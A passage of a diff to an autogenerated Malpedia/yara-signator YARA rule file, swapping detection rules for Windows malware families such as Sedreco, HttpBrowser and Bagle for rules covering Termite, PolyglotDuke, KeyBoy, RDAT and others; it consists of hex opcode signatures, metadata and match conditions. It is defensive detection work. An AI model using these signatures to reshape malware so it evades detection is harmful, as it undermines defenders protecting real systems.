8985d4feffff 6aff 8b8dd4feffff 8b11 } - $sequence_6 = { 8b45bc 50 8b4db8 51 ff15???????? 898540ffffff } - $sequence_7 = { c745fc08000000 6a74 8d855cffffff 50 ff15???????? 6a65 8d8d4cffffff } - $sequence_8 = { 50 68???????? ff15???????? 85c0 0f85bc000000 c745fc1a000000 } - $sequence_9 = { 52 ff15???????? 898550ffffff 8b4508 } + $sequence_0 = { 85c0 7511 e8???????? 84c0 7508 } + $sequence_1 = { 85c0 7511 e8???????? 84c0 7508 83c8ff e9???????? } + $sequence_2 = { 85c0 7511 e8???????? 84c0 } + $sequence_3 = { ff15???????? 85c0 7511 e8???????? 84c0 7508 83c8ff } + $sequence_4 = { 7511 e8???????? 84c0 7508 83c8ff e9???????? } + $sequence_5 = { ff15???????? 85c0 7511 e8???????? 84c0 7508 } + $sequence_6 = { 7511 e8???????? 84c0 7508 83c8ff } + $sequence_7 = { ff15???????? 85c0 7511 e8???????? 84c0 } + $sequence_8 = { 85c0 7511 e8???????? 84c0 7508 83c8ff } + $sequence_9 = { 4133c0 23c1 33c2 4103c1 } condition: - 7 of them and filesize <1335296 + 7 of them and filesize <950272 } -rule MALPEDIA_Win_Dexbia_Auto : FILE +rule MALPEDIA_Win_Termite_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2a243938-7809-594c-bcba-7fd4f6425c32" + id = "f52e0f9c-00a2-57d7-aba9-0dbbb1d1c2e2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexbia" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dexbia_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.termite" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.termite_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "13aa7ee33f2f2a26f0806c6fd2186fbe2a0332c45fef215a0c0786ff94a8b62c" + logic_hash = "cc787c4fe1eac82cec1ddbf65768a64c7a8c2c3d8dd4b766767f73077448495f" score = 75 quality = 75 tags = "FILE" @@ -157835,32 +160551,32 @@ rule MALPEDIA_Win_Dexbia_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bfd b908000000 be???????? 83c520 83c320 } - $sequence_1 = { a3???????? e8???????? 8db6ec894000 bf???????? } - $sequence_2 = { ff15???????? 85c0 740c 8b442414 85c0 742a } - $sequence_3 = { 5b 81c4e81b0000 c20400 57 ff15???????? b97f000000 33c0 } - $sequence_4 = { f3a5 8bcb 8d442410 83e103 50 f3a4 68???????? } - $sequence_5 = { 5e 5d 33c0 5b 81c408100000 c3 68???????? } - $sequence_6 = { 50 ffd5 a1???????? 85c0 0f841dffffff e8???????? 5f } - $sequence_7 = { 80e920 ebe0 80a0a09e400000 40 } - $sequence_8 = { 81c408100000 c3 ff15???????? 6a00 ff15???????? 5f 5e } - $sequence_9 = { 83c404 8bf0 33c0 89442414 8944241c } + $sequence_0 = { 8b4508 c1e003 89c2 c1e206 01d0 05???????? 8d5004 } + $sequence_1 = { e8???????? c744240814000000 8d45dc 89442404 8b45f4 890424 } + $sequence_2 = { c744241cffffffff c74424188cd44000 c7442414ffffffff 8b4510 89442410 8b450c 8944240c } + $sequence_3 = { 837dfc00 75d7 b800000000 c9 c3 55 } + $sequence_4 = { 8b10 a1???????? 8b4d08 894c2408 89542404 890424 e8???????? } + $sequence_5 = { e8???????? 83f814 7706 837d1400 7f0a b8ffffffff } + $sequence_6 = { 837d0c00 750a b800000000 e9???????? 8b450c 8b4010 8945f0 } + $sequence_7 = { 89442404 8b45f0 890424 e8???????? c70424???????? e8???????? 8b45f4 } + $sequence_8 = { c704240a000000 e8???????? eb0a c745f401000000 eb08 90 c745f400000000 } + $sequence_9 = { 83ec04 89442404 8d85b4feffff 890424 e8???????? 8d85b4feffff 89442404 } condition: - 7 of them and filesize <106496 + 7 of them and filesize <312320 } -rule MALPEDIA_Win_Ayegent_Auto : FILE +rule MALPEDIA_Win_Polyglotduke_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "38c6d34b-791e-51ab-b755-5bf91f226c75" + id = "afe4cb05-aa94-5225-84e8-b6489c3e26d1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ayegent_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.polyglotduke_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "7245e65e015426e49adecdb4c2a9413e067a055fe3d65973ee2cacb00da6dd3e" + logic_hash = "37a5b9867f5de08a35688f7a9273792487d4c60d613dec2d499a53b9323d3f00" score = 75 quality = 75 tags = "FILE" @@ -157874,34 +160590,34 @@ rule MALPEDIA_Win_Ayegent_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 80a0609d400000 40 41 41 3bc6 } - $sequence_1 = { 8d442448 53 50 68???????? 53 } - $sequence_2 = { 68???????? ffd6 8bf8 33f6 3bfb 897c241c 0f8cf9000000 } - $sequence_3 = { ff15???????? 8b4c2428 8b542424 51 8b4c2424 52 } - $sequence_4 = { 8d542440 51 52 ff15???????? 85c0 0f8415030000 8b3d???????? } - $sequence_5 = { 52 50 ffd6 6a00 8d8c2414010000 } - $sequence_6 = { 83c408 aa 8d842450040000 6804010000 } - $sequence_7 = { 55 56 8bb42438050000 33db } - $sequence_8 = { 72f1 56 8bf1 c1e603 3b9668774000 0f851c010000 } - $sequence_9 = { 53 51 68???????? ffd6 85c0 } + $sequence_0 = { e8???????? 488b5608 448bc7 488bc8 488bd8 e8???????? } + $sequence_1 = { 0fb7f9 492bf3 498bcb 33d2 33c0 } + $sequence_2 = { 48895c2408 57 4883ec20 488bfa 488bd9 488d0595970000 488981a0000000 } + $sequence_3 = { 4c8be8 e8???????? 488d0d88120100 e8???????? 488d4c2430 8bd3 4c8bc0 } + $sequence_4 = { 488be8 498bcc e8???????? 488bcf e8???????? } + $sequence_5 = { 48894518 e8???????? 488d0dbae30000 48894520 e8???????? 488d0daee30000 } + $sequence_6 = { 42392c3e 0f849bfaffff 428b143e 4a8d4c3e04 e8???????? 488d0dec0c0100 ba10000000 } + $sequence_7 = { e8???????? b8cdcccccc f7e5 c1ea02 8d0492 2be8 } + $sequence_8 = { 99 f77c2428 4863c2 410fb70c46 488b442440 4533f6 66894c4450 } + $sequence_9 = { 488bf1 8d4301 ba02000000 498be8 } condition: - 7 of them and filesize <90112 + 7 of them and filesize <222784 } -rule MALPEDIA_Win_Red_Gambler_Auto : FILE +rule MALPEDIA_Win_Disk_Knight_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4317a3dc-c3fe-56b3-9554-1937ca266fd2" + id = "9beebfb6-ef57-52bd-934c-31d9b91ab2bc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.red_gambler_auto.yar#L1-L292" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.disk_knight" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.disk_knight_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "7119f21e00db57c2b9d697114a153bc44616294e27589a57d490b5463e3562f7" + logic_hash = "e89ae24c28bc10924a7fb7bbea0ccafb184ecff432361cc9f981384efa6a4077" score = 75 - quality = 71 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -157913,56 +160629,34 @@ rule MALPEDIA_Win_Red_Gambler_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 807e01a2 7535 807e02c3 752f 68???????? 68???????? ff15???????? } - $sequence_1 = { 68???????? c745ece80f13fc ffd6 a3???????? } - $sequence_2 = { 68ff000000 8d8df0fcffff 51 ff15???????? 85c0 } - $sequence_3 = { 3bf1 72bf 5e 33c0 5b } - $sequence_4 = { e8???????? 8bf8 83c404 83ffff 74e1 57 8d4c244c } - $sequence_5 = { 8d4c2414 51 6a40 6a07 } - $sequence_6 = { 68???????? 68???????? ffd6 5e 85c0 7505 } - $sequence_7 = { 894dec 8955f0 8945f4 ff15???????? } - $sequence_8 = { 2b2a bee7eee947 7c26 0e } - $sequence_9 = { 8d4d98 51 ff15???????? 8d5598 52 8d8598fdffff } - $sequence_10 = { 7456 7b78 cd50 d46e } - $sequence_11 = { bc340e65bc 691fd8727fcf 14cf fd } - $sequence_12 = { 9e e779 9e 54 } - $sequence_13 = { 51 ff15???????? 83c414 6a00 6a00 8d9598fbffff } - $sequence_14 = { ff15???????? 6800010000 8d8d98fdffff 51 8d9598feffff 52 } - $sequence_15 = { 52 8d8598fdffff 50 68???????? } - $sequence_16 = { 3c3d 9e e7bd e600 3e3e25162f062d } - $sequence_17 = { 6a00 6a00 8d9598fbffff 52 68???????? 6a00 6a00 } - $sequence_18 = { 50 4c 48 44 40 6c } - $sequence_19 = { 6800010000 8d8dfcfdffff 51 6a00 } - $sequence_20 = { 68???????? 8d8d98fbffff 68???????? 51 ff15???????? 83c414 } - $sequence_21 = { 7c0e 07 642827 3ccf } - $sequence_22 = { 8d9598feffff 52 ff15???????? 8d8594fbffff 50 8d4d98 51 } - $sequence_23 = { 6800010000 8d85fcfeffff 50 6a00 ff15???????? } - $sequence_24 = { 2f 74be 6f 665b } - $sequence_25 = { 68???????? ff15???????? 8b7508 c7465c486b4000 83660800 } - $sequence_26 = { 6888130000 ffd7 6800010000 8d95fcfeffff } - $sequence_27 = { 55 8bec 8b4508 ff34c5d0814000 } - $sequence_28 = { 8bf8 ffd3 8bd8 ffd7 8b3d???????? 6aff ffd7 } - $sequence_29 = { 83f805 7d10 668b4c4310 66890c4580974000 40 ebe8 } - $sequence_30 = { 6a5c 8d8dfcfeffff 51 ff15???????? } - $sequence_31 = { 8bec 8b4508 33c9 3b04cd10804000 } + $sequence_0 = { 897d8c 897d88 ff15???????? 8b1d???????? 8d4dc4 51 } + $sequence_1 = { c745f0e01b4000 33c0 8945f4 8945f8 8845e0 6a01 ff15???????? } + $sequence_2 = { ff15???????? f7d8 1bc0 23f0 8d45b0 50 8d4dc0 } + $sequence_3 = { 8d8d7cffffff 51 56 ff5220 dbe2 85c0 7d0f } + $sequence_4 = { 8b4710 8d5594 52 50 8b08 ff9138010000 85c0 } + $sequence_5 = { 895004 8b8d48ffffff 894808 8b954cffffff 89500c 8b85e0feffff 8b08 } + $sequence_6 = { 3bc8 7d7d 8d9574ffffff 52 6a01 56 e8???????? } + $sequence_7 = { ff15???????? 8b3d???????? 83c40c 85f6 0f84d1010000 a1???????? 85c0 } + $sequence_8 = { e8???????? 8bf0 ff15???????? 8d54240c 8d8424a0000000 52 50 } + $sequence_9 = { 8b45d0 0f80ea060000 69db00010000 99 0f80dd060000 2bc2 899d10ffffff } condition: - 7 of them and filesize <327680 + 7 of them and filesize <868352 } -rule MALPEDIA_Win_Sedreco_Auto : FILE +rule MALPEDIA_Win_Nitlove_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5e87e6b5-1a55-584a-943a-cd1c621a520c" + id = "b00aecde-2bc6-57bb-930b-a202a51e31ba" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sedreco_auto.yar#L1-L450" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nitlove_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "480e943eac316911a45e26f995712fa56ee9e542b3cfeab42c526bed2d2dce35" + logic_hash = "702803544b3494bdcd3ba717ae94381060ca7fe1c8bd808ab3cc38c9aa80bcd5" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -157974,76 +160668,34 @@ rule MALPEDIA_Win_Sedreco_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 89450c 56 85c0 } - $sequence_1 = { c645ff30 e8???????? 85c0 7505 } - $sequence_2 = { 8bec 51 836d0804 53 } - $sequence_3 = { 836d0804 53 56 8b750c } - $sequence_4 = { 8b750c 56 e8???????? 6a08 } - $sequence_5 = { 50 68???????? 6a0d 68???????? } - $sequence_6 = { 51 6802020000 68???????? 50 } - $sequence_7 = { 7411 6a04 68???????? 68???????? } - $sequence_8 = { 7ce0 a1???????? 5e 85c0 } - $sequence_9 = { ff15???????? 83c604 81fe???????? 7ce0 } - $sequence_10 = { ffd6 8b0d???????? 898114010000 85c0 } - $sequence_11 = { ffd6 8b0d???????? 898198000000 85c0 } - $sequence_12 = { 56 be???????? 8b06 85c0 740f 50 } - $sequence_13 = { ffd6 8b0d???????? 894160 85c0 } - $sequence_14 = { ffd6 ffd0 a3???????? 5e 85c0 750a a1???????? } - $sequence_15 = { 6a01 68???????? ff35???????? ff15???????? ffd0 } - $sequence_16 = { 488b05???????? ff90e8000000 90 4883c420 } - $sequence_17 = { 68???????? e8???????? 8b35???????? 83c404 6a00 68???????? 6aff } - $sequence_18 = { 4889442420 41b906000200 4533c0 488b15???????? 48c7c101000080 488b05???????? ff9038010000 } - $sequence_19 = { 6800010000 6a00 68???????? e8???????? 6800020000 } - $sequence_20 = { ffd6 50 68???????? 6aff } - $sequence_21 = { 488b0d???????? 488b05???????? ff5010 85c0 } - $sequence_22 = { 50 68???????? 6aff 68???????? 6a00 6a00 ffd6 } - $sequence_23 = { 4883c428 c3 48890d???????? c3 48895c2410 4889742418 55 } - $sequence_24 = { 33d2 488d4c2450 488b05???????? ff90d8020000 } - $sequence_25 = { 4533c9 4533c0 ba000000c0 488b0d???????? 488b05???????? ff5040 } - $sequence_26 = { 448bc0 ba08000000 488b0d???????? ff15???????? 488905???????? } - $sequence_27 = { 488b0d???????? 488b05???????? ff5028 48c705????????00000000 } - $sequence_28 = { ffd6 8b4dfc 5f 5e 33cd b8???????? } - $sequence_29 = { 7cd5 68???????? e8???????? 8b4dfc 83c404 } - $sequence_30 = { 53 68???????? ff35???????? ffd6 ffd0 85c0 } - $sequence_31 = { e8???????? 8b8c2424020000 5b 33cc 33c0 e8???????? } - $sequence_32 = { 52 50 ff91f0000000 8bf0 } - $sequence_33 = { a1???????? 33c5 8945fc 6a0a 8d45f4 50 51 } - $sequence_34 = { 8d55f8 52 50 8b08 ff5124 } - $sequence_35 = { c20c00 6a02 ff74240c ff74240c e8???????? c20800 ff74240c } - $sequence_36 = { 57 50 ff512c 8bce } - $sequence_37 = { ff512c 8bf0 f7de 1bf6 46 } - $sequence_38 = { 8945fc 8b45f0 8945f4 8b45f4 } - $sequence_39 = { 50 8b08 ff9180000000 8b06 } - $sequence_40 = { ff512c 8bce 8bd8 e8???????? 57 } - $sequence_41 = { 57 c785ecfeffff01000000 c785e8feffffe197af54 0f6e85e8feffff 0f72f002 } - $sequence_42 = { 83ec24 53 56 57 c745dce197af54 } - $sequence_43 = { 8d443001 6a00 51 50 } - $sequence_44 = { 8d7901 8d4c2420 57 ff15???????? 84c0 } - $sequence_45 = { 6800040000 51 56 8974242c ff15???????? 85c0 0f8484010000 } - $sequence_46 = { 51 52 ff15???????? 8b442410 8b4e10 } - $sequence_47 = { a1???????? 8b00 8b4c2420 88440c18 } - $sequence_48 = { 85db 7548 fec8 53 b9???????? 8842ff } - $sequence_49 = { e8???????? 8a54240b 83c404 8b4c2430 895c2410 3bcb } - $sequence_50 = { 52 56 50 ff15???????? 6a01 } - $sequence_51 = { 8d442428 c684244010000001 8b11 8d4c2418 52 56 } + $sequence_0 = { 8d85c4feffff b902000080 66a5 be???????? 8d7df8 50 8d45f8 } + $sequence_1 = { ff15???????? 85c0 74e1 837dfcff } + $sequence_2 = { ffd7 8b75f4 8b4df8 8b859cfaffff 8b95a0faffff 83c010 } + $sequence_3 = { 0f853d010000 6a00 56 baf3b33d04 } + $sequence_4 = { 8945d8 8b4508 8945c0 8b450c } + $sequence_5 = { e8???????? ffd0 bab2bb282b b9???????? } + $sequence_6 = { ba7f22fb0e b9???????? e8???????? ffd0 } + $sequence_7 = { 8bcb e8???????? ffd0 ff75fc ba07d457d6 8bcb } + $sequence_8 = { 0f84aa000000 53 56 57 e8???????? e8???????? 8d45f8 } + $sequence_9 = { ffd0 8b4dfc 6a00 8904b1 b9???????? 837dec00 } condition: - 7 of them and filesize <1586176 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Httpbrowser_Auto : FILE +rule MALPEDIA_Win_Keyboy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "86ed1f1e-9c83-5189-8446-3be88e9701cf" + id = "1db1fbfb-59c2-5bfb-976b-a0743f8a46eb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.httpbrowser_auto.yar#L1-L178" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.keyboy_auto.yar#L1-L207" license_url = "N/A" - logic_hash = "5b5149262889d64634c3067408a546cd5b0c2e08f2004303b6cf9132eb7eeb82" + logic_hash = "c0d23ea688bcee5d6eecf54208ea66cac91415e69b2f38d43039891e2137c619" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -158055,38 +160707,44 @@ rule MALPEDIA_Win_Httpbrowser_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 ff7508 6a00 53 ffd6 8b45fc 33c9 } - $sequence_1 = { 50 895de0 ff5604 8945f0 85db 0f8489010000 } - $sequence_2 = { 33c5 8945fc 53 56 57 8d859cfeffff 33ff } - $sequence_3 = { 8d85f0fdffff 50 8d85d0f5ffff 50 ff15???????? } - $sequence_4 = { 56 6a03 6800000040 8d85f4fdffff 50 ff15???????? } - $sequence_5 = { e8???????? 83c40c 33c0 56 668985c8f3ffff 8d85caf3ffff } - $sequence_6 = { 83c438 ff15???????? 8d85f4fdffff 50 53 57 } - $sequence_7 = { ffb5f4edffff 8d85fcfdffff ffb5f8edffff 68???????? 50 } - $sequence_8 = { e8???????? 68c20ddf13 56 a3???????? e8???????? 83c438 } - $sequence_9 = { 6a00 6810040000 ff15???????? 8bf0 57 6a0e 56 } - $sequence_10 = { 83c414 c745ec00000000 68???????? 50 9c b80a000000 51 } - $sequence_11 = { b905000000 8db524ffffff 8dbda4feffff 8945e4 } - $sequence_12 = { 33c0 8dbd26ffffff 66899524ffffff f3ab 8955e8 8955f8 8955fc } - $sequence_13 = { 40 0068ae 224000 50 b822010000 } - $sequence_14 = { 8895a0c5ffff f3ab aa b91f000000 33c0 8dbd4affffff 66899548ffffff } - $sequence_15 = { 8b15???????? 8945d8 a1???????? 894ddc 668b0d???????? } + $sequence_0 = { 6a00 8945f2 8d45f8 50 6a0e } + $sequence_1 = { 51 ff75d8 6a00 ff75c0 } + $sequence_2 = { c705????????d468bcb5 c705????????2086e659 c705????????eec45abf c705????????bbee2bd1 c705????????3e20f129 } + $sequence_3 = { c705????????890e9944 c705????????dbd99823 c705????????d468bcb5 c705????????2086e659 } + $sequence_4 = { 5d c3 3b0d???????? f27502 f2c3 f2e953030000 55 } + $sequence_5 = { c705????????0caa6c89 c705????????a856701f c705????????597e743c c705????????0a9769e0 c705????????c4b85363 c705????????3abf261f c705????????890e9944 } + $sequence_6 = { 57 68cc020000 8d852cfdffff 8bf2 6a00 50 89b528fdffff } + $sequence_7 = { ff75dc ff15???????? 8d45dc 50 } + $sequence_8 = { e9???????? bbfeffffff eb05 bbfdffffff } + $sequence_9 = { 24a0 3ca0 7518 b800080000 } + $sequence_10 = { 6683f806 7404 32c9 eb02 b101 } + $sequence_11 = { c705????????34fbfb41 c705????????e6cd2b66 c705????????79e66d38 c705????????ba66ea37 c705????????1671e665 c705????????f3106cb3 c705????????526c1ed0 } + $sequence_12 = { e8???????? 85c0 755e 83ff20 } + $sequence_13 = { 2408 f6d8 1ac0 24dd } + $sequence_14 = { 41 84c0 75f0 8d55ec c745ec5c417070 } + $sequence_15 = { 7cd6 5f 5e 8be5 } + $sequence_16 = { ff15???????? 8b15???????? 8b4dc0 8945b8 e8???????? } + $sequence_17 = { 7207 b901000000 eb0f 3cfe } + $sequence_18 = { f7d9 85db 0f44c2 23c8 } + $sequence_19 = { 85d2 7e2a 8bce 81e107000080 } + $sequence_20 = { 3401 0fbec0 0fafc8 80f185 880c3e 46 } + $sequence_21 = { 1ac0 24dd 88474e e8???????? } condition: - 7 of them and filesize <188416 + 7 of them and filesize <2170880 } -rule MALPEDIA_Win_Ismagent_Auto : FILE +rule MALPEDIA_Win_Session_Manager_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "efc3a6d8-4046-5104-90f5-9440914b7f87" + id = "dc2cef80-2dcf-5809-93bd-82c69da769f0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ismagent_auto.yar#L1-L102" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.session_manager" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.session_manager_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "d297d8bd0034edde53a6d3eb1d7bb7add88b3f450af6b836362398a9173b61dc" + logic_hash = "603fcab78a4336ae9ff58b2ce6e64cc670272e944fe82c789ba11945e145dd5d" score = 75 quality = 75 tags = "FILE" @@ -158100,30 +160758,32 @@ rule MALPEDIA_Win_Ismagent_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ba???????? 6a00 6800000080 6a00 6a00 68???????? 53 } - $sequence_1 = { 89442440 85c0 752b 50 68???????? } - $sequence_2 = { eb7c c745e000fe4100 ebbb d9e8 8b4510 } - $sequence_3 = { e8???????? 83c408 89442418 85c0 0f8479020000 } - $sequence_4 = { 68e8030000 ff15???????? 8d8c2418030000 8d5101 } - $sequence_5 = { 7432 8d842418030000 68???????? 50 e8???????? 8bf0 } - $sequence_6 = { 8bf2 0f1f4000 8a02 42 84c0 75f9 8dbc2400070000 } - $sequence_7 = { 8d0439 7413 0f1f4000 803823 740a } + $sequence_0 = { 4c89b848240000 4c89b850240000 4c89b858240000 4c89b860240000 4c89b868240000 4c89b870240000 } + $sequence_1 = { 4c8d35fb2d0100 83e63f 488beb 48c1fd06 48c1e606 498b04ee } + $sequence_2 = { 4c89b838060000 4c89b840060000 4c89b848060000 4c89b850060000 4c89b858060000 4c89b860060000 4c89b868060000 } + $sequence_3 = { 4c89b8100b0000 4c89b8180b0000 4c89b8200b0000 4c89b8280b0000 4c89b8300b0000 4c89b8380b0000 } + $sequence_4 = { 4c89b8c8180000 4c89b8d0180000 4c89b8d8180000 4c89b8e0180000 4c89b8e8180000 4c89b8f0180000 } + $sequence_5 = { 4c89b890030000 4c89b898030000 4c89b8a0030000 4c89b8a8030000 4c89b8b0030000 4c89b8b8030000 4c89b8c0030000 } + $sequence_6 = { 4c89b820220000 4c89b828220000 4c89b830220000 4c89b838220000 4c89b840220000 4c89b848220000 4c89b850220000 } + $sequence_7 = { ff15???????? 488d0df81b0200 ff15???????? 488d0d7b170200 ff15???????? } + $sequence_8 = { 488d0dd7070000 e8???????? e8???????? 488d0d42070000 e8???????? } + $sequence_9 = { 4533c9 458d4101 488d542450 488bcb ff90a8000000 } condition: - 7 of them and filesize <327680 + 7 of them and filesize <372736 } -rule MALPEDIA_Win_Fuwuqidrama_Auto : FILE +rule MALPEDIA_Win_Lowzero_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2e69e70e-5601-5931-bcd7-e645b5b9c52f" + id = "ad1f4f71-db5d-51c4-9bc5-e40c45051891" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuwuqidrama" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fuwuqidrama_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowzero" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lowzero_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "8de556fe8f63afd7a879ecce2fdbb1a150474ddb330c86740527423f92305d9c" + logic_hash = "bfaa131f289b03263fe3207c7e09eedb0c528831bcdb16b693a70fc486a7a935" score = 75 quality = 75 tags = "FILE" @@ -158137,34 +160797,34 @@ rule MALPEDIA_Win_Fuwuqidrama_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b44241c 8db08c000000 8b8314140000 83f802 764a 8d6b1a 85ed } - $sequence_1 = { 8b842490020000 52 50 8d4c2444 68???????? 51 } - $sequence_2 = { 8917 8b542414 894704 b801000000 894f08 89570c 5f } - $sequence_3 = { 57 33ff 8bd9 57 57 8d4c2430 } - $sequence_4 = { 8bdf 036908 c1c305 036c2424 c1c61e 89742418 8b712c } - $sequence_5 = { 83c508 55 ffd7 8a542412 899ec8030000 8896c4030000 899ecc030000 } - $sequence_6 = { 8bdf 036918 c1c305 036c2410 c1c61e 89742428 8d9c2bd6c162ca } - $sequence_7 = { ff5220 8d460c 50 ff15???????? 8b4624 } - $sequence_8 = { 50 ffd6 8d4c242c 6a02 8d542418 51 52 } - $sequence_9 = { 3d10270000 0f87e7020000 8b5708 8b4704 52 50 8bcf } + $sequence_0 = { 0fb617 47 83fa20 0f83e2000000 42 8d0432 3bc1 } + $sequence_1 = { 57 8b423c 8b55f4 03c6 } + $sequence_2 = { 2bce 894df0 8d9b00000000 8d1c31 ff7734 85c0 } + $sequence_3 = { 7439 03c3 837f1400 7425 } + $sequence_4 = { 47 2bc8 8d4602 03c3 3b450c } + $sequence_5 = { 8b4d0c 3b7dfc 0f8255feffff 2b7508 5f 8bc6 5e } + $sequence_6 = { 8bce 83e21f c1eb05 c1e208 2bca 49 83fb07 } + $sequence_7 = { 83ec30 53 56 8bd9 8955f4 33f6 895dfc } + $sequence_8 = { 46 47 e9???????? 8bda 8bce 83e21f } + $sequence_9 = { e8???????? 5f 5e 5b c70007000000 33c0 8be5 } condition: - 7 of them and filesize <245760 + 7 of them and filesize <433152 } -rule MALPEDIA_Win_Bagle_Auto : FILE +rule MALPEDIA_Win_Rdat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "df34f7e5-e23a-57ca-9057-158d47df6a58" + id = "92191fa2-5f3d-5b42-a025-816ea5c7ba9a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bagle_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rdat_auto.yar#L1-L164" license_url = "N/A" - logic_hash = "191b784ad61e65e2f10fbf592eeed47046bf8d9317c3471370d1a12460ef9a14" - score = 75 - quality = 75 + logic_hash = "258a7b0e2fbdc995f078ce1c969b2a27e77e31fae7722d9e4f1fdbfa2416146c" + score = 60 + quality = 45 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -158176,32 +160836,38 @@ rule MALPEDIA_Win_Bagle_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { b03d f3aa 5b 5f 5e c9 } - $sequence_1 = { c745f400000000 6a06 6a01 6a02 e8???????? 8bd8 ff7508 } - $sequence_2 = { e340 ac c1e010 83f901 740b } - $sequence_3 = { c9 c20c00 c1c206 8bc2 } - $sequence_4 = { f7d9 2bf9 b03d f3aa 5b 5f 5e } - $sequence_5 = { 68???????? e8???????? 0bc0 7426 6880000000 68???????? e8???????? } - $sequence_6 = { c20c00 c1c206 8bc2 243f 3c3e } - $sequence_7 = { 53 8b7508 8b7d0c 8b4d10 } - $sequence_8 = { 59 43 83fb12 7508 33db } - $sequence_9 = { e8???????? 58 c9 c20400 55 8bec 83c4f8 } + $sequence_0 = { 3b7744 0f8c19ffffff 8b87ac020000 33ed } + $sequence_1 = { 48ffc3 4038341a 75f7 4883791810 488b7910 7203 488b09 } + 